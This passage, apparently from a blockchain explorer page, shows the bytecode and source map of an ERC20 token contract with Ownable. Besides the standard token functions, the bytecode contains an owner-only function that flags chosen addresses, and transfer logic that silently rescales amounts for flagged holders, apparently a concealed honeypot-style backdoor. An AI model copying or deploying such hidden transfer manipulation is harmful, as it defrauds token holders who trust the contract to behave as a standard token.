67ffffffffffffffff81111561117257611171611138565b5b60208301915083602082028301111561118e5761118d61113c565b5b9250929050565b5f805f604084860312156111ac576111ab61102e565b5b5f6111b9868287016110af565b935050602084013567ffffffffffffffff8111156111da576111d9611032565b5b6111e686828701611140565b92509250509250925092565b6111fb81611090565b82525050565b5f6020820190506112145f8301846111f2565b92915050565b5f805f606084860312156112315761123061102e565b5b5f61123e8682870161107c565b935050602061124f8682870161107c565b9250506040611260868287016110af565b9150509250925092565b5f60ff82169050919050565b61127f8161126a565b82525050565b5f6020820190506112985f830184611276565b92915050565b5f602082840312156112b3576112b261102e565b5b5f6112c08482850161107c565b91505092915050565b6112d281611055565b82525050565b5f6020820190506112eb5f8301846112c9565b92915050565b5f80604083850312156113075761130661102e565b5b5f6113148582860161107c565b92505060206113258582860161107c565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061137357607f821691505b6020821081036113865761138561132f565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6113f082611090565b91506113fb83611090565b9250828201905080821115611413576114126113b9565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611473602583610f8e565b915061147e82611419565b604082019050919050565b5f6020820190508181035f8301526114a081611467565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611501602683610f8e565b915061150c826114a7565b604082019050919050565b5f6020820190508181035f83015261152e816114f5565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f61158f602483610f8e565b915061159a82611535565b604082019050919050565b5f6020820190508181035f8301526115bc81611583565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f61161d602283610f8e565b9150611628826115c3565b604082019050919050565b5f6020820190508181035f83015261164a81611611565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611685601d83610f8e565b915061169082611651565b602082019050919050565b5f6020820190508181035f8301526116b281611679565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611713602583610f8e565b915061171e826116b9565b604082019050919050565b5f6020820190508181035f83015261174081611707565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6117a1602383610f8e565b91506117ac82611747565b604082019050919050565b5f6020820190508181035f8301526117ce81611795565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61182f602683610f8e565b915061183a826117d5565b604082019050919050565b5f6020820190508181035f83015261185c81611823565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611897602083610f8e565b91506118a282611863565b602082019050919050565b5f6020820190508181035f8301526118c48161188b565b9050919050565b5f6118d582611090565b91506118e083611090565b92508282026118ee81611090565b91508282048414831517611905576119046113b9565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61194382611090565b915061194e83611090565b92508261195e5761195d61190c565b5b82820490509291505056fea2646970667358221220b3ebcb2550c934829add13851970a712a53ee37c720f12206e580d68f20eed6164736f6c63430008160033

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100fe575f3560e01c8063715018a611610095578063a9059cbb11610064578063a9059cbb146102ae578063d1f6401e146102de578063dd62ed3e1461030e578063f2fde38b1461033e576100fe565b8063715018a6146102385780638da5cb5b1461024257806395d89b4114610260578063a457c2d71461027e576100fe565b806323b872dd116100d157806323b872dd1461018a578063313ce567146101ba57806339509351146101d857806370a0823114610208576100fe565b806306fdde0314610102578063095ea7b314610120578063125115fd1461015057806318160ddd1461016c575b5f80fd5b61010a61035a565b604051610117919061100e565b60405180910390f35b61013a600480360381019061013591906110c3565b6103ea565b604051610147919061111b565b60405180910390f35b61016a60048036038101906101659190611195565b61040c565b005b6101746104d3565b6040516101819190611201565b60405180910390f35b6101a4600480360381019061019f919061121a565b6104dc565b6040516101b1919061111b565b60405180910390f35b6101c261050a565b6040516101cf9190611285565b60405180910390f35b6101f260048036038101906101ed91906110c3565b610512565b6040516101ff919061111b565b60405180910390f35b610222600480360381019061021d919061129e565b610548565b60405161022f9190611201565b60405180910390f35b61024061058e565b005b61024a6105a1565b60405161025791906112d8565b60405180910390f35b6102686105c8565b604051610275919061100e565b60405180910390f35b610298600480360381019061029391906110c3565b610658565b6040516102a5919061111b565b60405180910390f35b6102c860048036038101906102c391906110c3565b6106cd565b6040516102d5919061111b565b60405180910390f35b6102f860048036038101906102f3919061129e565b6106ef565b6040516103059190611201565b60405180910390f35b610328600480360381019061032391906112f1565b610735565b6040516103359190611201565b60405180910390f35b6103586004803603810190610353919061129e565b6107b7565b005b6060600480546103699061135c565b80601f01602080910402602001604051908101604052809291908181526020018280546103959061135c565b80156103e05780601f106103b7576101008083540402835291602001916103e0565b820191905f5260205f20905b8154815290600101906020018083116103c357829003601f168201915b5050505050905090565b5f806103f4610839565b9050610401818585610840565b600191505092915050565b6104146105a1565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461044a575f80fd5b5f5b828290508110156104cd578360035f85858581811061046e5761046d61138c565b5b9050602002016020810190610483919061129e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550808060010191505061044c565b50505050565b5f600654905090565b5f806104e6610839565b90506104f3858285610a03565b6104fe858585610a8e565b60019150509392505050565b5f6012905090565b5f8061051c610839565b905061053d81858561052e8589610735565b61053891906113e6565b610840565b600191505092915050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610596610d91565b61059f5f610e0f565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546105d79061135c565b80601f01602080910402602001604051908101604052809291908181526020018280546106039061135c565b801561064e5780601f106106255761010080835404028352916020019161064e565b820191905f5260205f20905b81548152906001019060200180831161063157829003601f168201915b5050505050905090565b5f80610662610839565b90505f61066f8286610735565b9050838110156106b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106ab90611489565b60405180910390fd5b6106c18286868403610840565b60019250505092915050565b5f806106d7610839565b90506106e4818585610a8e565b600191505092915050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6107bf610d91565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361082d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082490611517565b60405180910390fd5b61083681610e0f565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108ae576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108a5906115a5565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361091c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091390611633565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516109f69190611201565b60405180910390a3505050565b5f610a0e8484610735565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610a885781811015610a7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a719061169b565b60405180910390fd5b610a878484848403610840565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610afc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af390611729565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b61906117b7565b60405180910390fd5b5f81905061beef60035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460035f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610bf791906113e6565b10610c0857610c0582610ed0565b90505b5f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610c8c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c8390611845565b60405180910390fd5b82810360015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610d779190611201565b60405180910390a3610d8a858585610ef4565b5050505050565b610d99610839565b73ffffffffffffffffffffffffffffffffffffffff16610db76105a1565b73ffffffffffffffffffffffffffffffffffffffff1614610e0d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e04906118ad565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f620efdaf610eda83610ee391906118cb565b610eed9190611939565b9050919050565b610fff60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403610f7f5761beef60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610fbb578082015181840152602081019050610fa0565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610fe082610f84565b610fea8185610f8e565b9350610ffa818560208601610f9e565b61100381610fc6565b840191505092915050565b5f6020820190508181035f8301526110268184610fd6565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61105f82611036565b9050919050565b61106f81611055565b8114611079575f80fd5b50565b5f8135905061108a81611066565b92915050565b5f819050919050565b6110a281611090565b81146110ac575f80fd5b50565b5f813590506110bd81611099565b92915050565b5f80604083850312156110d9576110d861102e565b5b5f6110e68582860161107c565b92505060206110f7858286016110af565b9150509250929050565b5f8115159050919050565b61111581611101565b82525050565b5f60208201905061112e5f83018461110c565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f84011261115557611154611134565b5b8235905067ffffffffffffffff81111561117257611171611138565b5b60208301915083602082028301111561118e5761118d61113c565b5b9250929050565b5f805f604084860312156111ac576111ab61102e565b5b5f6111b9868287016110af565b935050602084013567ffffffffffffffff8111156111da576111d9611032565b5b6111e686828701611140565b92509250509250925092565b6111fb81611090565b82525050565b5f6020820190506112145f8301846111f2565b92915050565b5f805f606084860312156112315761123061102e565b5b5f61123e8682870161107c565b935050602061124f8682870161107c565b9250506040611260868287016110af565b9150509250925092565b5f60ff82169050919050565b61127f8161126a565b82525050565b5f6020820190506112985f830184611276565b92915050565b5f602082840312156112b3576112b261102e565b5b5f6112c08482850161107c565b91505092915050565b6112d281611055565b82525050565b5f6020820190506112eb5f8301846112c9565b92915050565b5f80604083850312156113075761130661102e565b5b5f6113148582860161107c565b92505060206113258582860161107c565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061137357607f821691505b6020821081036113865761138561132f565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6113f082611090565b91506113fb83611090565b9250828201905080821115611413576114126113b9565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611473602583610f8e565b915061147e82611419565b604082019050919050565b5f6020820190508181035f8301526114a081611467565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611501602683610f8e565b915061150c826114a7565b604082019050919050565b5f6020820190508181035f83015261152e816114f5565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f61158f602483610f8e565b915061159a82611535565b604082019050919050565b5f6020820190508181035f8301526115bc81611583565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f61161d602283610f8e565b9150611628826115c3565b604082019050919050565b5f6020820190508181035f83015261164a81611611565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611685601d83610f8e565b915061169082611651565b602082019050919050565b5f6020820190508181035f8301526116b281611679565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611713602583610f8e565b915061171e826116b9565b604082019050919050565b5f6020820190508181035f83015261174081611707565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6117a1602383610f8e565b91506117ac82611747565b604082019050919050565b5f6020820190508181035f8301526117ce81611795565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61182f602683610f8e565b915061183a826117d5565b604082019050919050565b5f6020820190508181035f83015261185c81611823565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611897602083610f8e565b91506118a282611863565b602082019050919050565b5f6020820190508181035f8301526118c48161188b565b9050919050565b5f6118d582611090565b91506118e083611090565b92508282026118ee81611090565b91508282048414831517611905576119046113b9565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f61194382611090565b915061194e83611090565b92508261195e5761195d61190c565b5b82820490509291505056fea2646970667358221220b3ebcb2550c934829add13851970a712a53ee37c720f12206e580d68f20eed6164736f6c63430008160033

Deployed Bytecode Sourcemap

80:468:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;909:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3187:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;335:211:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1998:106:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3946:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1846:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6899:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2162:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2457:101:0;;;:::i;:::-;;1834:85;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1120:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4719:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2483:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;227:102:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2730:149:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2707:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;909:98:1;963:13;995:5;988:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;909:98;:::o;3187:197::-;3270:4;3286:13;3302:12;:10;:12::i;:::-;3286:28;;3324:32;3333:5;3340:7;3349:6;3324:8;:32::i;:::-;3373:4;3366:11;;;3187:197;;;;:::o;335:211:3:-;431:7;:5;:7::i;:::-;417:21;;:10;:21;;;408:32;;;;;;455:9;450:90;474:5;;:12;;470:1;:16;450:90;;;525:4;507:5;:15;513:5;;519:1;513:8;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;507:15;;;;;;;;;;;;;;;:22;;;;488:3;;;;;;;450:90;;;;335:211;;;:::o;1998:106:1:-;2059:7;2085:12;;2078:19;;1998:106;:::o;3946:286::-;4073:4;4089:15;4107:12;:10;:12::i;:::-;4089:30;;4129:38;4145:4;4151:7;4160:6;4129:15;:38::i;:::-;4177:27;4187:4;4193:2;4197:6;4177:9;:27::i;:::-;4221:4;4214:11;;;3946:286;;;;;:::o;1846:91::-;1904:5;1928:2;1921:9;;1846:91;:::o;6899:234::-;6987:4;7003:13;7019:12;:10;:12::i;:::-;7003:28;;7041:64;7050:5;7057:7;7094:10;7066:25;7076:5;7083:7;7066:9;:25::i;:::-;:38;;;;:::i;:::-;7041:8;:64::i;:::-;7122:4;7115:11;;;6899:234;;;;:::o;2162:125::-;2236:7;2262:9;:18;2272:7;2262:18;;;;;;;;;;;;;;;;2255:25;;2162:125;;;:::o;2457:101:0:-;1727:13;:11;:13::i;:::-;2521:30:::1;2548:1;2521:18;:30::i;:::-;2457:101::o:0;1834:85::-;1880:7;1906:6;;;;;;;;;;;1899:13;;1834:85;:::o;1120:102:1:-;1176:13;1208:7;1201:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1120:102;:::o;4719:427::-;4812:4;4828:13;4844:12;:10;:12::i;:::-;4828:28;;4866:24;4893:25;4903:5;4910:7;4893:9;:25::i;:::-;4866:52;;4956:15;4936:16;:35;;4928:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;5047:60;5056:5;5063:7;5091:15;5072:16;:34;5047:8;:60::i;:::-;5135:4;5128:11;;;;4719:427;;;;:::o;2483:189::-;2562:4;2578:13;2594:12;:10;:12::i;:::-;2578:28;;2616;2626:5;2633:2;2637:6;2616:9;:28::i;:::-;2661:4;2654:11;;;2483:189;;;;:::o;227:102:3:-;280:7;306:5;:16;312:9;306:16;;;;;;;;;;;;;;;;299:23;;227:102;;;:::o;2730:149:1:-;2819:7;2845:11;:18;2857:5;2845:18;;;;;;;;;;;;;;;:27;2864:7;2845:27;;;;;;;;;;;;;;;;2838:34;;2730:149;;;;:::o;2707:198:0:-;1727:13;:11;:13::i;:::-;2815:1:::1;2795:22;;:8;:22;;::::0;2787:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2870:28;2889:8;2870:18;:28::i;:::-;2707:198:::0;:::o;587:96::-;640:7;666:10;659:17;;587:96;:::o;9347:370:1:-;9495:1;9478:19;;:5;:19;;;9470:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9575:1;9556:21;;:7;:21;;;9548:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9657:6;9627:11;:18;9639:5;9627:18;;;;;;;;;;;;;;;:27;9646:7;9627:27;;;;;;;;;;;;;;;:36;;;;9694:7;9678:32;;9687:5;9678:32;;;9703:6;9678:32;;;;;;:::i;:::-;;;;;;;;9347:370;;;:::o;9998:441::-;10128:24;10155:25;10165:5;10172:7;10155:9;:25::i;:::-;10128:52;;10214:17;10194:16;:37;10190:243;;10275:6;10255:16;:26;;10247:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10357:51;10366:5;10373:7;10401:6;10382:16;:25;10357:8;:51::i;:::-;10190:243;10118:321;9998:441;;;:::o;5599:905::-;5741:1;5725:18;;:4;:18;;;5717:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5817:1;5803:16;;:2;:16;;;5795:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;5870:15;5888:6;5870:24;;5935:6;5922:5;:9;5928:2;5922:9;;;;;;;;;;;;;;;;5908:5;:11;5914:4;5908:11;;;;;;;;;;;;;;;;:23;;;;:::i;:::-;:33;5904:91;;5967:17;5977:6;5967:9;:17::i;:::-;5957:27;;5904:91;6005:19;6027:9;:15;6037:4;6027:15;;;;;;;;;;;;;;;;6005:37;;6075:6;6060:11;:21;;6052:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;6190:6;6176:11;:20;6158:9;:15;6168:4;6158:15;;;;;;;;;;;;;;;:38;;;;6390:7;6373:9;:13;6383:2;6373:13;;;;;;;;;;;;;;;;:24;;;;;;;;;;;6438:2;6423:26;;6432:4;6423:26;;;6442:6;6423:26;;;;;;:::i;:::-;;;;;;;;6460:37;6480:4;6486:2;6490:6;6460:19;:37::i;:::-;5707:797;;5599:905;;;:::o;1992:130:0:-;2066:12;:10;:12::i;:::-;2055:23;;:7;:5;:7::i;:::-;:23;;;2047:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1992:130::o;3059:187::-;3132:16;3151:6;;;;;;;;;;;3132:25;;3176:8;3167:6;;:17;;;;;;;;;;;;;;;;;;3230:8;3199:40;;3220:8;3199:40;;;;;;;;;;;;3122:124;3059:187;:::o;10445:90:1:-;10497:7;10526;10518:5;10514:1;:9;;;;:::i;:::-;:19;;;;:::i;:::-;10507:26;;10445:90;;;:::o;11123:169::-;11258:5;11245;:9;11251:2;11245:9;;;;;;;;;;;;;;;;:18;11241:45;;11278:6;11266:5;:9;11272:2;11266:9;;;;;;;;;;;;;;;:18;;;;11241:45;11123:169;;;:::o;7:99:4:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:117::-;3555:1;3552;3545:12;3569:117;3678:1;3675;3668:12;3692:117;3801:1;3798;3791:12;3832:568;3905:8;3915:6;3965:3;3958:4;3950:6;3946:17;3942:27;3932:122;;3973:79;;:::i;:::-;3932:122;4086:6;4073:20;4063:30;;4116:18;4108:6;4105:30;4102:117;;;4138:79;;:::i;:::-;4102:117;4252:4;4244:6;4240:17;4228:29;;4306:3;4298:4;4290:6;4286:17;4276:8;4272:32;4269:41;4266:128;;;4313:79;;:::i;:::-;4266:128;3832:568;;;;;:::o;4406:704::-;4501:6;4509;4517;4566:2;4554:9;4545:7;4541:23;4537:32;4534:119;;;4572:79;;:::i;:::-;4534:119;4692:1;4717:53;4762:7;4753:6;4742:9;4738:22;4717:53;:::i;:::-;4707:63;;4663:117;4847:2;4836:9;4832:18;4819:32;4878:18;4870:6;4867:30;4864:117;;;4900:79;;:::i;:::-;4864:117;5013:80;5085:7;5076:6;5065:9;5061:22;5013:80;:::i;:::-;4995:98;;;;4790:313;4406:704;;;;;:::o;5116:118::-;5203:24;5221:5;5203:24;:::i;:::-;5198:3;5191:37;5116:118;;:::o;5240:222::-;5333:4;5371:2;5360:9;5356:18;5348:26;;5384:71;5452:1;5441:9;5437:17;5428:6;5384:71;:::i;:::-;5240:222;;;;:::o;5468:619::-;5545:6;5553;5561;5610:2;5598:9;5589:7;5585:23;5581:32;5578:119;;;5616:79;;:::i;:::-;5578:119;5736:1;5761:53;5806:7;5797:6;5786:9;5782:22;5761:53;:::i;:::-;5751:63;;5707:117;5863:2;5889:53;5934:7;5925:6;5914:9;5910:22;5889:53;:::i;:::-;5879:63;;5834:118;5991:2;6017:53;6062:7;6053:6;6042:9;6038:22;6017:53;:::i;:::-;6007:63;;5962:118;5468:619;;;;;:::o;6093:86::-;6128:7;6168:4;6161:5;6157:16;6146:27;;6093:86;;;:::o;6185:112::-;6268:22;6284:5;6268:22;:::i;:::-;6263:3;6256:35;6185:112;;:::o;6303:214::-;6392:4;6430:2;6419:9;6415:18;6407:26;;6443:67;6507:1;6496:9;6492:17;6483:6;6443:67;:::i;:::-;6303:214;;;;:::o;6523:329::-;6582:6;6631:2;6619:9;6610:7;6606:23;6602:32;6599:119;;;6637:79;;:::i;:::-;6599:119;6757:1;6782:53;6827:7;6818:6;6807:9;6803:22;6782:53;:::i;:::-;6772:63;;6728:117;6523:329;;;;:::o;6858:118::-;6945:24;6963:5;6945:24;:::i;:::-;6940:3;6933:37;6858:118;;:::o;6982:222::-;7075:4;7113:2;7102:9;7098:18;7090:26;;7126:71;7194:1;7183:9;7179:17;7170:6;7126:71;:::i;:::-;6982:222;;;;:::o;7210:474::-;7278:6;7286;7335:2;7323:9;7314:7;7310:23;7306:32;7303:119;;;7341:79;;:::i;:::-;7303:119;7461:1;7486:53;7531:7;7522:6;7511:9;7507:22;7486:53;:::i;:::-;7476:63;;7432:117;7588:2;7614:53;7659:7;7650:6;7639:9;7635:22;7614:53;:::i;:::-;7604:63;;7559:118;7210:474;;;;;:::o;7690:180::-;7738:77;7735:1;7728:88;7835:4;7832:1;7825:15;7859:4;7856:1;7849:15;7876:320;7920:6;7957:1;7951:4;7947:12;7937:22;;8004:1;7998:4;7994:12;8025:18;8015:81;;8081:4;8073:6;8069:17;8059:27;;8015:81;8143:2;8135:6;8132:14;8112:18;8109:38;8106:84;;8162:18;;:::i;:::-;8106:84;7927:269;7876:320;;;:::o;8202:180::-;8250:77;8247:1;8240:88;8347:4;8344:1;8337:15;8371:4;8368:1;8361:15;8388:180;8436:77;8433:1;8426:88;8533:4;8530:1;8523:15;8557:4;8554:1;8547:15;8574:191;8614:3;8633:20;8651:1;8633:20;:::i;:::-;8628:25;;8667:20;8685:1;8667:20;:::i;:::-;8662:25;;8710:1;8707;8703:9;8696:16;;8731:3;8728:1;8725:10;8722:36;;;8738:18;;:::i;:::-;8722:36;8574:191;;;;:::o;